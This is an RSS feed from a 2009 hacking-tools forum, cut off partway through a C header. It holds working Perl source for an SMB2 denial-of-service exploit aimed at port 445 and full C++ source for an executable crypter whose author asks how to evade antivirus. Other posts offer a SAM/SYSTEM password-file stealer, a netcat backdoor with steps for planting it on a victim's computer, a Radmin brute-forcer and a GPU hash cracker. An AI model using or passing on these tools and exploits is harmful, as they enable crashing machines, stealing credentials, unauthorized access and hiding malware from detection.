<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
	<title>Hacking Tools Downloads</title>
	<description>The latest in hacking tools</description>
	<link>http://www.governmentsecurity.org/forum/index.php</link>
	<pubDate>Thu, 10 Sep 2009 02:28:20 +0000</pubDate>
	<ttl>1</ttl>
	<item>
		<title>Smb2 Nuke</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32074</link>
		<description><![CDATA[you probably all have seen the python code making the rounds yesterday<br />
i was to lazy to install python so i converted it to perl and assembly<br />
<br />
<a href='http://illmob.org/smb2nuke.exe' class='bbc_url' title='External link' rel='nofollow external'>http://illmob.org/smb2nuke.exe</a><br />
<br />
peep the old skool winuke95 throwback gui <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /><br />
http://img35.imageshack.us/img35/8003/winnuke09.jpg<br />
<br />
<p class='citation'>Quote</p><div class="blockquote"><div class='quote'>#!/usr/bin/perl<br />
## smb2nuke by illwill<br />
## translated to perl because i didnt feel like installing python<br />
## Usage: smb2nuke.pl IPaddress (i.e. smb2nuke.pl 192.168.0.1)<br />
####################################################################################<br />
use IO::Socket;<br />
<br />
$nuke = "&#092;x00&#092;x00&#092;x00&#092;x90".<br />
"&#092;xff&#092;x53&#092;x4d&#092;x42".<br />
"&#092;x72&#092;x00&#092;x00&#092;x00".<br />
"&#092;x00&#092;x18&#092;x53&#092;xc8".<br />
"&#092;x00&#092;x26".<br />
"&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;xff&#092;xff&#092;xff&#092;xfe".<br />
"&#092;x00&#092;x00&#092;x00&#092;x00&#092;x00&#092;x6d&#092;x00&#092;x02&#092;x50&#092;x43&#092;x20&#092;x4e&#092;x45&#092;x54".<br />
"&#092;x57&#092;x4f&#092;x52&#092;x4b&#092;x20&#092;x50&#092;x52&#092;x4f&#092;x47&#092;x52&#092;x41&#092;x4d&#092;x20&#092;x31".<br />
"&#092;x2e&#092;x30&#092;x00&#092;x02&#092;x4c&#092;x41&#092;x4e&#092;x4d&#092;x41&#092;x4e&#092;x31&#092;x2e&#092;x30&#092;x00".<br />
"&#092;x02&#092;x57&#092;x69&#092;x6e&#092;x64&#092;x6f&#092;x77&#092;x73&#092;x20&#092;x66&#092;x6f&#092;x72&#092;x20&#092;x57".<br />
"&#092;x6f&#092;x72&#092;x6b&#092;x67&#092;x72&#092;x6f&#092;x75&#092;x70&#092;x73&#092;x20&#092;x33&#092;x2e&#092;x31&#092;x61".<br />
"&#092;x00&#092;x02&#092;x4c&#092;x4d&#092;x31&#092;x2e&#092;x32&#092;x58&#092;x30&#092;x30&#092;x32&#092;x00&#092;x02&#092;x4c".<br />
"&#092;x41&#092;x4e&#092;x4d&#092;x41&#092;x4e&#092;x32&#092;x2e&#092;x31&#092;x00&#092;x02&#092;x4e&#092;x54&#092;x20&#092;x4c".<br />
"&#092;x4d&#092;x20&#092;x30&#092;x2e&#092;x31&#092;x32&#092;x00&#092;x02&#092;x53&#092;x4d&#092;x42&#092;x20&#092;x32&#092;x2e".<br />
"&#092;x30&#092;x30&#092;x32&#092;x00";<br />
<br />
print "-&gt;smb2nuke.pl&lt;-$/$/";<br />
print "-&gt; Trying to Connect to $ARGV[0]:445$/";<br />
$socket = IO::Socket::INET-&gt;new(<br />
			PeerAddr 	=&gt; "$ARGV[0]", <br />
			PeerPort 	=&gt; '445', <br />
			Proto 		=&gt; 'tcp',<br />
			Timeout 	=&gt; '45') or die "-!&gt; Can't connect to $ARGV[0]:445 -&gt; $!&#092;r&#092;n";<br />
print "-&gt; Connected to $ARGV[0]:445$/";<br />
$socket-&gt;autoflush();<br />
<br />
print $socket "$nuke";<br />
<br />
print "-&gt; Box should be nuked.$/"</div></div>]]></description>
		<pubDate>Thu, 10 Sep 2009 02:28:20 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32074</guid>
	</item>
	<item>
		<title>Trace Any Process With Free Tool</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32058</link>
		<description><![CDATA[Trace all your windows running processes, i.e what they do where connect , what they open and send:<br />
Tool is free SO MODERATORS stop deleting my messages.<br />
<a href='http://www.hotlinkfiles.com/files/2786572_fpyai/processmonitor26.zip' class='bbc_url' title='External link' rel='nofollow external'>http://www.hotlinkfiles.com/files/2786572_fpyai/processmonitor26.zip</a><br />
Best Regards<br />
Nick Niceman]]></description>
		<pubDate>Mon, 31 Aug 2009 22:29:04 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32058</guid>
	</item>
	<item>
		<title>Batch2Exe</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32044</link>
		<description><![CDATA[Okay, before anyone flames me ill say that i know this is offtopic, and if anyone knows where this should be, or if a mod can move this, i'd appreciate it.<br />
<br />
 But basically. I cant do anything. i cant even PM people. and i need this file very bad.<br />
<br />
<a href='http://www.governmentsecurity.org/forum/index.php?showtopic=14767' class='bbc_url' title='External link' rel='nofollow external'>http://www.governmentsecurity.org/forum/index.php?showtopic=14767</a><br />
<br />
help me please. and thank you.]]></description>
		<pubDate>Thu, 27 Aug 2009 05:56:18 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32044</guid>
	</item>
	<item>
		<title>Simple Flash dictionary maker</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31785</link>
		<description><![CDATA[you just need a browser with Flash player: <a href='http://www.ddd.ee/dmaker/dmaker.html' class='bbc_url' title='External link' rel='nofollow external'>http://www.ddd.ee/dmaker/dmaker.html</a>]]></description>
		<pubDate>Fri, 22 May 2009 16:53:05 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31785</guid>
	</item>
	<item>
		<title>Quick SAM/SYSTEM Stealer</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31631</link>
		<description><![CDATA[I made a quick batch file which, when booted, will mount ntfs drives and steal the SAM and SYSTEM files. I used DOS stuff to make a memory stick bootable, used NTFS4DOS to mount the partitions and just plain COPY to copy the files. You can put this on a floppy (you will have to delete some files, it is a bit big) and boot it, all you need to do it type 'yes' when it asks. I timed this and it takes 28 seconds in total. You can then use the SAM and SYSTEM files it steals with CAIN to crack the users and passwords. It saves the file as SAM+drive letter it took it from (e.g SAMF if it came from the F:&#092; drive) It is the same with the SYSTEM file but with SYSTEM instead of SAM.<br />
<br />
Comments please<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5056" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5056" title="">STEALER.rar</a> <span class='desc'><strong>(1.29MB)</strong></span>
<br /><span class="desc info">: 90</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sat, 04 Apr 2009 11:17:35 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31631</guid>
	</item>
	<item>
		<title>CUDA Mysql/Sha1 Cracker</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31591</link>
		<description><![CDATA[Project overhauled, ATI support + mssql support done:)<br />
<br />
So, i finally got around writing a CUDA Mysql/sha1/mssql hash cracker.<br />
I'm releasing it here. Its free as in freedom <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/tongue.gif' class='bbc_emoticon' alt=':P' /> You're NOT welcome to use this in any commercial products. Feel free to use this code in any free open source software tho <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/wink.gif' class='bbc_emoticon' alt=';)' /> <br />
<br />
600mhashes/s on each 4870x2 in my system makes 2.4Bhashes/s on SHA1:)<br />
There's one bug left, the NVIDIA version does not support plaintext lengths 1-3 properly, i might need some halp fixing this. I'm probably not going to spend too much time on this project for a while <img src='http://www.governmentsecurity.org/forum/public/style_emoticons/default/tongue.gif' class='bbc_emoticon' alt=':P' /> (Feel free to send me mail with an idea on how to fix this tho )<br />
<br />
To compile the ATI kernel, you'll need to install my set of compiler hacks, because the ATI brook+ compiler is just plain shitty, and i didn't feel like copying my code 30+ times.<br />
<br />
Todo:<br />
-network support.<br />
-more optimization<br />
-some cleaning up<br />
<br />
Binaries and source included.<br />
<br />
If it's slow, feel free to mess around with it and recompile it:)<br />
<br />
If it doesn't work: try installing nvidia's CUDA and ati's Brook+ (runtimes included now, so it SHOULD work.)<br />
<br />
<br />
And yes i know i use smileys way too much.<br />
<br />
Edit:<br />
<pre class='prettyprint'>Made the ATI kernel compatible with newer versions of the driver. Fixed the NVIDIA kernel (uninitialized variable DATA1). </pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Uploaded the wrong RAR file, included the wrong ATI kernel. fixed now.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> 430% increase in speed on NVIDIA, 50% increase on ATI. Pretty much all bugs fixed.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> Added a minidump system. For those people that experience crashes, SEND MINIDUMPS.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'> Damn ATI for adding TLS for no reason in their SDK. It SHOULD REALLY REALLY BE FIXED NOW.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Apperantly statically declared TLS caused a lot of bugs on operating systems lower than vista. Got that fixed now.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Another bug fixed + nvidia code optimized a bit.</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug in the NVIDIA kernel, thanks to budden for reporting it. Also note: CUDA HATES UPX!</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>I'd like to shoutout to: budden from the 3.14 forums, and darkwerewolf (my mentor).</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>ATI support added. Project rewritten to modular layout. Code needs some cleaning up and optimisation now. MSSQL support added.</pre><br />
<br />
<br />
Edit:<br />
<br />
<pre class='prettyprint'>Added -minlength and -maxlength commandline parameters.
			 
			 The commandline parameters are:
			 Set the output file : -outfile file.txt
			 Set the hash input file: -hashes file.txt
			 Set the charset file	: -charset file.txt
			 Set the min pass len :-minlength 10
		 
			 
			 And, if the hashes in the file are mysql hashes, specify the commandline option -mysql.
			 For mssql, set the commandline option -mssql.
		 
			 For the format of these files: The hash input file should be in the following format: HASH&#092;r&#092;n, so the file ends with a newline. See the archive for an example.
			 
			 The charset file should contain no newlines. Only a valid character set.</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug that would make the program unable to scan the last set of passwords of each block correctly. (Hackish fix, should be cleaned up later).</pre><br />
<br />
Edit:<br />
<pre class='prettyprint'>Fixed a bug that would make the program unable to scan beyond 5 character passwords (am i going f'ing blind?).</pre><br />
<br />
<br />
Edit:<br />
<pre class='prettyprint'>Multi GPU support added. Speed improved by approx 11%. Should work wonders on fast gpu's. Logging added. Send me some stats (mhashes/seconds) and logs!</pre><div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5112" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5112" title="">releasecracker.zip</a> <span class='desc'><strong>(1.73MB)</strong></span>
<br /><span class="desc info">: 14</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sat, 28 Mar 2009 20:35:51 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31591</guid>
	</item>
	<item>
		<title>Simple Backdoor</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31545</link>
		<description><![CDATA[Here is a very simple backdoor i made. It uses Netcat for windows which is included in the zip. You run the Netcat.exe file on the victim computer. You need access to the computer to do this, If you want it to start on boot run the Netcat.reg file. The Netcat.exe file was written using autohotkey and the .ahk file is the source thing. THIS IS NOT UNDETECTABLE!!!! You will need to log onto the victims computer, copy the files to C:&#092;WINDOWS&#092;system32&#092; folder and add BOTH files to antivirus exceptions, possibly even firewall exceptions. The only files you need to copy are nc.exe and Netcat.exe. The reg file must be run if you want it to start on startup. The backdoor shows up in task manager as nc.exe but if you change the filename(and the ahk file(then compile it)) it will show up as different. To connect you can use telnet(or netcat) or Putty, port 303. <br />
<br />
Please tell me what you think so i can improve it.<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5046" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5046" title="">Backdoor.zip</a> <span class='desc'><strong>(224.83K)</strong></span>
<br /><span class="desc info">: 117</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Wed, 18 Mar 2009 18:31:49 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31545</guid>
	</item>
	<item>
		<title>Novas Radmin Brute Force Attack .NET v1.0</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=31179</link>
		<description><![CDATA[Novas Radmin Brute Force Attack .NET v1.0<br />
<br />
Designed for use with radmin &lt;= 2.0 it will attempt to connect and authenticate using passwords<br />
contained in password.txt, on successful authentication the application will write the details<br />
to a text file using the target as its filename. It does contain the ability to multithread<br />
different IP's though testing produced varying results and advise against.<br />
<br />
Prerequisites: .Net framework 3.<br />
<br />
<br />
Wu-tang can (filtered) himself, don't steal others work for your glory! everyone else enjoy.<br />
Distrubuted via governmentsecurity.org<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5009" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=5009" title="">nrbfNET.rar</a> <span class='desc'><strong>(448.03K)</strong></span>
<br /><span class="desc info">: 334</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Sun, 11 Jan 2009 15:45:20 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=31179</guid>
	</item>
	<item>
		<title>DSplit GUI</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30846</link>
		<description><![CDATA[I made a simple little GUI for DSplit, DSplit is included in the install but it has been renamed to dsp.exe you can replace my dsp.exe with your DSplit.exe but you will have to reanme it dsp.exe.<br />
To use this all you have to do is click the buttons.<br />
To pick the file that you want to split click the very open button then find the file you want to split.<br />
Then when you have the program you want to split choose a project name. This will make a sub folder in the GUI folder so it will not flood your desktop or where ever you have the file you want to split.<br />
then click Start Procedure and it will copy the dsp.exe and your file into that folder.<br />
then you can change the values and click split.<br />
if you do not want to just highlight and delete the extra files it makes you can use the Clear Folder it will delete everything in the folder with your permission but the backup in it will restore the file-to-split and the dsplit as long as the program is open so that is ok.<br />
Sorry if this information is kind of bunched together it is currently 12:57 AM here and I am very tired.<br />
Hope you like and please post comments.<br />
P.S. The download link is the installer version(made with installsheild) of this.<br />
<pre class='prettyprint'>http&#58;//www.youshare.com/Guest/dd8623e5c73f988d.zip.html</pre>]]></description>
		<pubDate>Sat, 22 Nov 2008 06:29:49 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30846</guid>
	</item>
	<item>
		<title>DosDrop 2.1</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30742</link>
		<description><![CDATA[===========================================================<br />
description: a program that drops the current folders' path <br />
             into a cmd prompt, works on nt/2k/xp/2k3<br />
             Vista gives you an "Elevated" Command Prompt<br />
===========================================================<br />
features:<br />
*only 2.5kb<br />
<br />
<br />
Instructions:<br />
  unzip the zipfile into a folder<br />
  open dosdrop.exe<br />
  BAM! ur done<br />
  now right click any folder and choose DOSDrop and it <br />
  will drop you to that folders path in a 'h4x0r-like'<br />
  command prompt. why? Because the matrix made black<br />
  and green consoles cool.  <img src='/forum/public/style_emoticons/default/ph34r.gif' class='bbc_emoticon' alt=':ph34r:' /> <br />
===========================================================<br />
<br />
please let me know if any bugs , i don't have vista to test on<br />
but it should work by giving you an elevated cmd prompt<div id='attach_wrap' class='rounded clearfix'>
	<h4></h4>
	<ul>
		
			<li class='clear'>
				<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4969" title=""><img src="http://www.governmentsecurity.org/forum/public/style_extra/mime_types/zip.gif" alt="" /></a>
&nbsp;<a href="http://www.governmentsecurity.org/forum/index.php?app=core&module=attach&section=attach&attach_id=4969" title="">DosDrop2.1.zip</a> <span class='desc'><strong>(1.25K)</strong></span>
<br /><span class="desc info">: 63</span>
			</li>
		
	</ul>
</div>]]></description>
		<pubDate>Tue, 11 Nov 2008 05:37:35 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30742</guid>
	</item>
	<item>
		<title>C(ode) Injector v0.3</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30355</link>
		<description><![CDATA[Hello Everyone,<br />
<br />
this is my tool for injecting code to executables. Code to be injected ("stub") is written in C language. In the archive there is "stub_maker" directory with a framework for creating stubs. Just fill user_main() with your code and inject it to executable! Code in binary form will be then added to executable. No lame binding and shit.<br />
<br />
This is one of first versions, so it is not stable yet. Read readme.txt first!!!!!!<br />
<br />
I cannot upload anything ("Upload failed. Please ask the administrator to ensure the uploads directory is writeable").<br />
<br />
Comments are welcome.<br />
<br />
<a href='http://rapidshare.com/files/153364307/CodeInj.zip.html' class='bbc_url' title='External link' rel='nofollow external'>http://rapidshare.com/files/153364307/CodeInj.zip.html</a><br />
<br />
EDIT: in getprocaddr.h file you have to comment out the line ' #include "mem.h" ']]></description>
		<pubDate>Sun, 12 Oct 2008 18:25:07 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=30355</guid>
	</item>
	<item>
		<title>PE EXE encryptor in 200 lines of code (100% C++, 0% asm)</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=30281</link>
		<description><![CDATA[Hi,<br />
<br />
I have written a simple PE EXE encryptor, that encrypts code section only. Decryptor routine is added to a "cave" in code section. If a "cave" is too small than executable won't be encrypted. In this version I'm using a lame encryption algorithm. This code is 100% C++ ( life is too short to code in assembler <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /> ).<br />
<br />
I have a question to experts: Some files encrypted by a newer version of this encryptor (encryption of all sections, not only the code section) are detected as TR/Crypt.XPACK.Gen by Avira. Can you point me to some anti-detection techniques that will make encrypted file look 100% clean?<br />
<br />
Any comments how to improve it?<br />
<br />
I couldn't upload it as an attachment ("Upload failed. Please ask the administrator to ensure the uploads directory is writeable") - I attach src code in this post. Compile it with command "g++ -O1 main.cpp -o p.exe".<br />
<br />
<br />
Cheers<br />
<span style='font-family: Courier New'><br />
---main.cpp------------------------------------------------------</span><br />
<span style='font-family: Courier New'>/****************************************************************************<br />
<br />
Project:                   PE EXE Encryptor<br />
Version:                0.1<br />
Author:                    [ my name was here <img src='/forum/public/style_emoticons/default/smile.gif' class='bbc_emoticon' alt=':)' /> ]<br />
Date:                      04.10.2008<br />
<br />
Description:<br />
    Program encrypts code section of a windows executable with primitive<br />
    algorithm. Decryptor is added to a "cave" in code section.<br />
<br />
*/<br />
<br />
<br />
#include &lt;windows.h&gt;<br />
#include &lt;stdio.h&gt;<br />
#include "pe_exe.h"<br />
<br />
#define MASK_PTR  0xFFAABB01<br />
#define MASK_SIZE 0xFFAABB02<br />
#define MASK_OEP  0xFFAABB03<br />
<br />
#define ERROR_NOT_AN_EXE         -1<br />
#define ERROR_CAVE_TOO_SMALL     -2<br />
#define ERROR_MASK_NOT_FOUND     -3<br />
<br />
#define MY_DEBUG<br />
<br />
typedef unsigned int dword;<br />
<br />
void decrypt(char *ptr, int size);<br />
<br />
////////////////////////////////////////////////////////////////////////////////<br />
// code of the decryption stub<br />
<br />
void decrypt_start()<br />
{<br />
     dword *ret;<br />
     <br />
     dword PTR=MASK_PTR;<br />
     dword SIZE=MASK_SIZE;<br />
     decrypt((char*)PTR,(int)SIZE);<br />
     <br />
     dword OEP=MASK_OEP;<br />
     ret=(dword*)&ret+2;<br />
     (*ret)=(dword)OEP;<br />
}<br />
<br />
void decrypt(char *ptr, int size)<br />
{<br />
     for (int i=0; i&lt;size; i++)<br />
         ptr[i]=ptr[i]^0x13;<br />
}<br />
<br />
void decrypt_end() {}<br />
<br />
////////////////////////////////////////////////////////////////////////////////<br />
// encryption function<br />
<br />
void encrypt(char *ptr, int size)<br />
{<br />
     for (int i=0; i&lt;size; i++)<br />
         ptr[i]=ptr[i]^0x13;<br />
}<br />
<br />
////////////////////////////////////////////////////////////////////////////////<br />
// replace a 32 bit mask in binary code with val, will work in 99% cases<br />
<br />
bool replace_mask(dword codePtr, dword size, dword mask, dword val)<br />
{<br />
    int i;<br />
    dword *ptr;<br />
    for (i=0; i&lt;size; i++) {<br />
        ptr=(dword*)(codePtr+i);<br />
        if (*ptr==mask)<br />
        {<br />
                *ptr=val;       <br />
                return true;<br />
        }<br />
    }<br />
    return false;<br />
}<br />
<br />
////////////////////////////////////////////////////////////////////////////////<br />
// encrypt a pe exe in memory<br />
<br />
int inject_code_mem(char *pe_image, int pe_size)<br />
{<br />
    // check if the file is a valid pe executable<br />
    MZ_HEADER *mz_header;<br />
    mz_header=(MZ_HEADER*)pe_image;<br />
    if (mz_header-&gt;mz_id!=0x5a4d)<br />
        return 0;<br />
    PE_HEADER *pe_header;<br />
    pe_header=(PE_HEADER*)(pe_image+mz_header-&gt;mz_neptr);<br />
    if (pe_header-&gt;pe_id!=0x4550)<br />
        return ERROR_NOT_AN_EXE;<br />
<br />
    // offset to section table == offset to PE header + PE header size (0x18) + size of optional PE header<br />
    dword section_table_ptr=mz_header-&gt;mz_neptr+0x18+pe_header-&gt;pe_ntheadersize;<br />
<br />
    // search for code section in section table<br />
    PE_OBJENTRY *section;<br />
    PE_OBJENTRY *code_section;<br />
    for (int i=0; i&lt;pe_header-&gt;pe_numofobjects; i++)<br />
    {<br />
        section=(PE_OBJENTRY*)(pe_image+section_table_ptr+i*sizeof(PE_OBJENTRY));<br />
        if ((section-&gt;oe_objectflags & 32) &gt; 0)            // 5th bit == 1 =&gt; section is executable<br />
        {<br />
           code_section=section;<br />
           break;<br />
        }<br />
    }<br />
    <br />
    // check if there is some unused space in code section<br />
    int cave_size=code_section-&gt;oe_physsize-code_section-&gt;oe_virtsize;<br />
    int code_size=int(decrypt_end)-int(decrypt_start);  <br />
#ifdef MY_DEBUG<br />
    printf("cave_size=%d&#092;n",cave_size);<br />
    printf("code_size=%d&#092;n",code_size);<br />
#endif<br />
    if (cave_size&lt;code_size)<br />
        return ERROR_CAVE_TOO_SMALL;<br />
    <br />
    // copy decompression stub to the exe file<br />
    char *ptr_dst=(char*)(pe_image+code_section-&gt;oe_physoffs+code_section-&gt;oe_virtsize);<br />
    char *ptr_src=(char*)decrypt_start;<br />
    for (int i=0; i&lt;code_size; i++)<br />
        ptr_dst[i]=ptr_src[i];<br />
          <br />
    // replace binary masks in the decompressor - original entry point (MASK_OEP),<br />
    // pointer to encrypted code (MASK_PTR) and decompressor size (MASK_SIZE)<br />
    replace_mask((dword)ptr_dst,code_size,MASK_OEP,pe_header-&gt;pe_entrypointrva+pe_header-&gt;pe_imagebase);<br />
    replace_mask((dword)ptr_dst,code_size,MASK_PTR,code_section-&gt;oe_virtrva+pe_header-&gt;pe_imagebase);<br />
    replace_mask((dword)ptr_dst,code_size,MASK_SIZE,code_section-&gt;oe_virtsize);<br />
<br />
    // encrypt code section<br />
    encrypt((char*)(pe_image+code_section-&gt;oe_physoffs),code_section-&gt;oe_virtsize);<br />
<br />
    // fix entry point, virtual size of code section and make code section writable<br />
    pe_header-&gt;pe_entrypointrva=code_section-&gt;oe_virtrva+code_section-&gt;oe_virtsize;<br />
    code_section-&gt;oe_virtsize+=code_size;<br />
    code_section-&gt;oe_objectflags|=0x80000000; // make code section writable - bit 31<br />
<br />
    return 0;<br />
}<br />
<br />
bool encrypt_exe(char *name)<br />
{<br />
    FILE *f;<br />
    f=fopen(name,"rb+");<br />
    if (f==NULL)<br />
    {<br />
       printf("Cannot open file %s&#092;n",name);<br />
       return false;<br />
    }<br />
<br />
    fseek(f,0,SEEK_END);   <br />
    int fsize=ftell(f);<br />
    fseek(f,0,SEEK_SET);<br />
    char *buf=new char[fsize];<br />
    fread(buf,fsize,1,f);<br />
    fseek(f,0,SEEK_SET);<br />
<br />
    int res=inject_code_mem(buf,fsize);<br />
    if (res&gt;=0)<br />
       fwrite(buf,fsize,1,f);<br />
<br />
    delete [] buf;<br />
    fclose(f);<br />
    return res;<br />
}<br />
<br />
int main(int argc, char **argv)<br />
{<br />
    if (argc&lt;2)<br />
    {<br />
       printf("Usage: %s &lt;file.exe&gt;&#092;n",argv[0]);<br />
       return 0;<br />
    }<br />
<br />
    encrypt_exe(argv[1]);<br />
    <br />
    return 0;<br />
}<br />
<br />
---pe_exe.h---------------------------------------------------------------------------<br />
<br />
<br />
////////x///////x///////x///////x///////x///////x///////x///////x///////x////<br />
<br />
#ifndef __PE_HPP__<br />
#define __PE_HPP__<br />
<br />
//#pragma pack(push)<br />
//#pragma pack(1)<br />
<br />
typedef struct MZ_STRUCT<br />
{<br />
WORD    mz_id;<br />
WORD    mz_last512;<br />
WORD    mz_num512;<br />
WORD    mz_relnum;<br />
WORD    mz_headersize;<br />
WORD    mz_minmem;<br />
WORD    mz_maxmem;<br />
WORD    mz_ss;<br />
WORD    mz_sp;<br />
WORD    mz_checksum;<br />
WORD    mz_ip;<br />
WORD    mz_cs;<br />
WORD    mz_relofs;<br />
WORD    mz_ovrnum;<br />
BYTE    mz_reserved[32];<br />
DWORD   mz_neptr;<br />
} MZ_HEADER;<br />
<br />
typedef struct PE_STRUCT<br />
{<br />
DWORD   pe_id;                  // 00 01 02 03<br />
WORD    pe_cputype;             // 04 05<br />
WORD    pe_numofobjects;        // 06 07<br />
DWORD   pe_datetime;            // 08 09 0A 0B<br />
DWORD   pe_coffptr;             // 0C 0D 0E 0F<br />
DWORD   pe_coffsize;            // 10 11 12 13<br />
WORD    pe_ntheadersize;        // 14 15<br />
WORD    pe_flags;               // 16 17<br />
        // NT_Header {<br />
WORD    pe_magic;               // 18 19<br />
BYTE    pe_linkmajor;           // 1A<br />
BYTE    pe_linkminor;           // 1B<br />
DWORD   pe_sizeofcode;          // 1C 1D 1E 1F<br />
DWORD   pe_sizeofidata;         // 20 21 22 23<br />
DWORD   pe_sizeofudata;         // 24 25 26 27<br />
DWORD   pe_entrypointrva;       // 28 29 2A 2B<br />
DWORD   pe_baseofcode;          // 2C 2D 2E 2F<br />
DWORD   pe_baseofdata;          // 30 31 32 33<br />
DWORD   pe_imagebase;           // 34 35 36 37<br />
DWORD   pe_objectalign;         // 38 39 3A 3B<br />
DWORD   pe_filealign;           // 3C 3D 3E 3F<br />
WORD    pe_osmajor;             // 40 41<br />
WORD    pe_osminor;             // 42 43<br />
WORD    pe_usermajor;           // 44 45<br />
WORD    pe_userminor;           // 46 47<br />
WORD    pe_subsysmajor;         // 48 49<br />
WORD    pe_subsysminor;         // 4A 4B<br />
DWORD   pe_reserved;            // 4C 4D 4E 4F<br />
DWORD   pe_imagesize;           // 50 51 52 53<br />
DWORD   pe_headersize;          // 54 55 56 56<br />
DWORD   pe_checksum;            // 58 59 5A 5B<br />
WORD    pe_subsystem;           // 5C 5D<br />
WORD    pe_dllflags;            // 5E 5F<br />
DWORD   pe_stackreserve;        // 60 61 62 63<br />
DWORD   pe_stackcommit;         // 64 65 66 67<br />
DWORD   pe_heapreserve;         // 68 69 6A 6B<br />
DWORD   pe_heapcommit;          // 6C 6D 6E 6F<br />
DWORD   pe_loaderflags;         // 70 71 72 73<br />
DWORD   pe_numofrvaandsizes;    // 74 75 76 77<br />
        // rva and sizes<br />
DWORD   pe_exportrva;           // 78 79 7A 7B<br />
DWORD   pe_exportsize;          // 7C 7D 7E 7F<br />
DWORD   pe_importrva;           // 80 81 82 83<br />
DWORD   pe_importsize;          // 84 85 86 87<br />
DWORD   pe_resourcerva;         // 88 89 8A 8B<br />
DWORD   pe_resourcesize;        // 8C 8D 8E 8F<br />
DWORD   pe_exceptionrva;        // 90 91 92 93<br />
DWORD   pe_exceptionsize;       // 94 95 96 97<br />
DWORD   pe_securityrva;         // 98 99 9A 9B<br />
DWORD   pe_securitysize;        // 9C 9D 9E 9F<br />
DWORD   pe_fixuprva;            // A0 A1 A2 A3<br />
DWORD   pe_fixupsize;           // A4 A5 A6 A7<br />
DWORD   pe_debugrva;            // A8 A9 AA AB<br />
DWORD   pe_debugsize;           // AC AD AE AF<br />
DWORD   pe_descriptionrva;      // B0 B1 B2 B3<br />
DWORD   pe_descriptionsize;     // B4 B5 B6 B7<br />
DWORD   pe_machinerva;          // B8 B9 BA BB<br />
DWORD   pe_machinesize;         // BC BD BE BF<br />
DWORD   pe_tlsrva;              // C0 C1 C2 C3<br />
DWORD   pe_tlssize;             // C4 C5 C6 C7<br />
